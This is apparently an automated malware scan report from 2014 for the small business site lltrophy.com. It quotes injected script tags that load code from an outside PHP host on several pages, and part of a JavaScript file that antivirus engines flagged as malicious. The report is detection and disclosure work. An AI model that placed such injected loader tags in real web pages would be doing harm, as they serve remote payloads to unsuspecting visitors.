Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lltrophy.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lltrophy.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 02:51:53 GMT Location: http://www.lltrophy.com/ Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: TS018c80b7=010bd78044f8972461589c43031cc50ceb9d627ce1c7040ffe2fd4f3b6e5c719bf0e725285; Path=/ | clean |
http://www.lltrophy.com/ | 200 OK Content-Length: 5363 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215006"></script> | ||
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://lltrophy.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 13 Dec 2014 02:51:55 GMT Location: http://www.lltrophy.com/index.html Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: TS018c80b7=010bd78044c06e7b67a50b16f0e64256e843250ce70607be7815ed96eb065b8be8ea27ad73; Path=/ | clean |
http://www.lltrophy.com/index.html | 200 OK Content-Length: 5363 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215006"></script> | ||
http://www.lltrophy.com/industrial.html | 200 OK Content-Length: 9509 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215007"></script> | ||
http://www.lltrophy.com/res/clearbox.js?config=default | 200 OK Content-Length: 5557 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var CB_Scripts = document.getElementsByTagName('script'); for(i=0;i<CB_Scripts.length;i++){ if (CB_Scripts[i].getAttribute('src')){ var q=CB_Scripts[i].getAttribute('src'); if(q.match('clearbox.js')){ var url = q.split('clearbox.js'); var path = url[0]; var query = url[1].substring(1); var pars = query.split('&'); for(j=0; j<pars.length; j++) { par = pars[j].split('='); switch(par[0]) { case 'c
Antivirus reports:
| ||
http://www.lltrophy.com/schools.html | 200 OK Content-Length: 10211 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215010"></script> | ||
http://www.lltrophy.com/commercial.html | 200 OK Content-Length: 11105 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215002"></script> | ||
http://www.lltrophy.com/corporate.html | 200 OK Content-Length: 16902 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215004"></script> | ||
http://www.lltrophy.com/miscellaneous.html | 200 OK Content-Length: 10750 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://leannenterprisesllc.com/mykhdcvp.php?id=8215009"></script> | ||
http://www.lltrophy.com/slides/misc1.jpg | 200 OK Content-Length: 77930 Content-Type: image/jpeg | clean |
http://www.lltrophy.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.lltrophy.com/slides/misc2.jpg | 200 OK Content-Length: 73097 Content-Type: image/jpeg | clean |
http://www.lltrophy.com/slides/misc3.jpg | 200 OK Content-Length: 76352 Content-Type: image/jpeg | clean |
http://www.lltrophy.com/slides/misc4.jpg | 200 OK Content-Length: 93345 Content-Type: image/jpeg | clean |
http://www.lltrophy.com/slides/misc5.jpg | 200 OK Content-Length: 101182 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lltrophy.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Dec 2014 02:51:53 GMT
Location: http://www.lltrophy.com/
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TS018c80b7=010bd78044f8972461589c43031cc50ceb9d627ce1c7040ffe2fd4f3b6e5c719bf0e725285; Path=/
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lltrophy.com
Referer: http://www.google.com/search?q=lltrophy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.